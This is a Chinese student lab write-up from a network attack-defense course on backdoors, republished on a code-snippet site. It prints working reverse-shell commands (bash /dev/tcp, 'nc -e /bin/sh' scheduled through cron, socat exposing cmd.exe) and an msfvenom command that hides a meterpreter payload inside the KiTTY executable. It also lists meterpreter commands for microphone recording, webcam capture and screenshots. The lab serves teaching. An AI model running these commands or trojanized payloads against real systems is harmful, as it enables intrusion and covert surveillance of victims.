正文 

当前位置: 首页 > 代码 > java教程

2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)

Blackay03 Blackay03     2022-10-28     547

关键词:

2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践

[博客目录]

1-实践目标

1.1-实践介绍

学习内容:

  • 使用nc实现win,mac,Linux间的后门连接
  • meterpreter的应用
  • MSF POST 模块的应用

学习目标:
建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

返回目录

1.2-实践内容

  • 使用netcat获取主机操作Shell,cron启动 (0.5分)
  • 使用socat获取主机操作Shell, 任务计划启动 (0.5分)
  • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
  • 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

返回目录

1.3-实践要求

  • 基础问题回答

    • 例举你能想到的一个后门进入到你系统中的可能方式?
    • 例举你知道的后门如何启动起来(win及linux)的方式?
    • Meterpreter有哪些给你映像深刻的功能?
    • 如何发现自己有系统有没有被安装后门?

  • 实验总结与体会

  • 实践过程记录

  • 报告评分 1.5分

    • 报告整体观感 0.5分
    • 报告格式范围,版面整洁 加0.5。
    • 报告排版混乱,加0分。

  • 文字表述 1分

    • 报告文字内容非常全面,表述清晰准确 加1分。
    • 报告逻辑清楚,比较简要地介绍了自己的操作目标与过程 加0.5分。
    • 报告逻辑混乱表述不清或文字有明显抄袭可能 加0分

返回目录

2-实践过程

2.1 使用nc实现mac,Linux间的后门连接

  • Mac获取Linux Shell
    首先主控端/服务端MAC运行指令如下,8888是nc监听的端口号,然后运行:bash -i >& /dev/tcp/192.168.3.59/8888 0>&1,失败,再试nc 192.168.3.59 8888 -e /bin/sh

    发现并没有什么用……失败
  • Linux获取Mac Shell
    首先获取Linux的ip:ifconfig,然后监听nc -l -p 8888,Mac方面进行连接:bash -i >& /dev/tcp/192.168.20.154/8888 0>&1

    这时我们发现Linux终端上显示了MAC的命令提示符:

返回目录

2.2 使用netcat获取主机操作Shell

使用netcat获取主机操作Shell,cron启动

  • 在Windows系统下监听5217端口ncat.exe -l -p 5217
  • 在Kali中用crontab -e编辑一条定时任务:
    使用vim,直接在最下面一行加入25 * * * * /bin/netcat 192.168.196.136 5322 -e /bin/sh

返回目录

2.3 3使用socat获取主机操作Shell

使用socat获取主机操作Shell, 任务计划启动

  • 首先在Windows系统中找到“计划任务”

  • 创建基本任务>一次>启动程序socat.exe>参数输入:tcp-listen:5322 exec:cmd.exe,pty,stderr (两个参数之间用空格或者;)
  • 启动任务,并在Kali中输入socat - tcp:windowsIP:端口


    然后就会发现获得了win的操作shell

返回目录

2.4 meterpreter的应用

我的电脑系统是Mac,老师教程给的是Windows+Linux的例子,因为15年的渣渣Air开两个虚拟机会凉凉(别问我为什么……),争分夺秒,度秒如年……

  1. 首先选择一个windows可执行文件,执行如下指令:
    msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
    生成的文件复制到windows中。

  2. 打开msfconsole:输入以下指令:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.196.140
    set LPORT 4444 //这里不知道为啥变成4444了
    show options
    exploit
  1. 在Windows平台上运行可执行文件,Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell:

返回目录

2.5 Meterpreter常用功能

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 获取Windows命令行界面,以方便执行Windows内置功能指令,exit退出。
  2. 获取ruby交互界面,exit退出
  3. 进程和和迁移

    这里出现timeout,超时了,只能再运行一下后门了。
    ……
  4. 接下来我们试试提音频:record_mic
  5. 接下来是看看摄像头:webcam_snap
  6. 看看截图?screenshot
  7. 还有其他的很多操作,可以通过help指令来了解

返回目录

2.6 基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
    答:可能通过网站挂马的方式,让用户加载网页的时候下载到用户的电脑上。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    答:Linux发送后门到Windows上,Windows可以只要运行就能启动后门
  • Meterpreter有哪些给你映像深刻的功能?
    答:截屏,拍照,录音……
  • 如何发现自己有系统有没有被安装后门?
    答:这个看经验吧,主要是得注意上网,不要乱点链接,不要插陌生U盘等等……

返回目录

3-实验感想&参考资料

实验感想:非常有趣的实验,基本上是满足了我对于黑客的幻想(获取远程控制shell和摄像头O(∩_∩)O),总之感觉很棒,希望能在将来学到更多东西!

返回目录

2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win,mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情

2017-2018-2《网络对抗技术》20155322exp4恶意代码分析(代码片段)

...标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-Mac下网络监控2.2-Windows下网络监控2.3-Mac下恶意软件分析2.4-Windows下恶意软件分析2.5-基础问题回答3-资料1-实践目标1.1-恶意代码分析一般是对恶意软件做处理,让它不被杀毒软件... 查看详情

2017-2018-2《网络对抗技术》20155322exp5msf基础应用

[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-情报收集2.2-主动攻击实践-ms08_0672.3-浏览器攻击实践-many*32.4-客户端攻击实践-CoolPDF2.5-基础问题回答3-资料1-实践目标1.1-MSF基础应用掌握metasploit的基本应用... 查看详情

网络对抗技术-网络对抗实验二

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验二网络嗅探与欺骗   学生姓名 郭家俊年级 2014级区队 三区队指导教师 高见  信息技术与网络安全学院2016年... 查看详情

2017-2018-2《网络攻防》第五周作业

....SIDGusser6.Sqlsus7.burpsuits8.owaspzap9.webscarab10.fuzzing工具集二《网络攻防》学习总结Web安全攻防技术与实现web应用程序体系结构及其安全威胁web应用体系结构浏览器web服务器web应用程序数据库传输协议http/httpsweb应用安全威胁针 查看详情

2017-2018-2《密码与安全新技术》第2周作业(代码片段)

...币是一种由开源的P2P软件产生的电子币,数字币,是一种网络虚拟资产。比特币也被译为“比特金”。2.比特币的特点数字货币不依托于任何国家或组织通过P2P分布式技术 查看详情

网络对抗技术实验四

  网络对抗技术实验四  中国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名魏成豪 年级2014级 区队六区队 指导教师高见 &... 查看详情

网络对抗技术

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 陈子锐年级 2014级区队 二区队指导教师 高见  信息技术与网络安全学院2016年11... 查看详情

网络对抗技术实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名夏新宇年级2014 区队四区队 指导教师高见   信息技术与网络安全学院2017年7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名赵致远年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017年7月7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名翟一鸣 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017... 查看详情

网络对抗技术实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名李培朗 年级 2014级区队 一区队指导教师 高见  信息技术与网络安全学院2... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名石琳 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017年7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名袁昊晨 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017... 查看详情

网络对抗技术——实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名雷浩年级2014级 区队五区指导教师高见   信息技术与网络安全学院2017年7月7日&nbs... 查看详情

网络对抗技术——实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名王启兆年级2014级 区队五区指导教师高见   信息技术与网络安全学院2017年7月7日&... 查看详情

网络对抗技术实验1

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名李镇吉年级2014级 区队网安二区指导教师 高见  信息技术与网络安全学院2017年09... 查看详情

实验四网络对抗技术

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名  武国瑞年级2014级区队 一区队指导教师 高见  信息技术与网络安全学院2017年10... 查看详情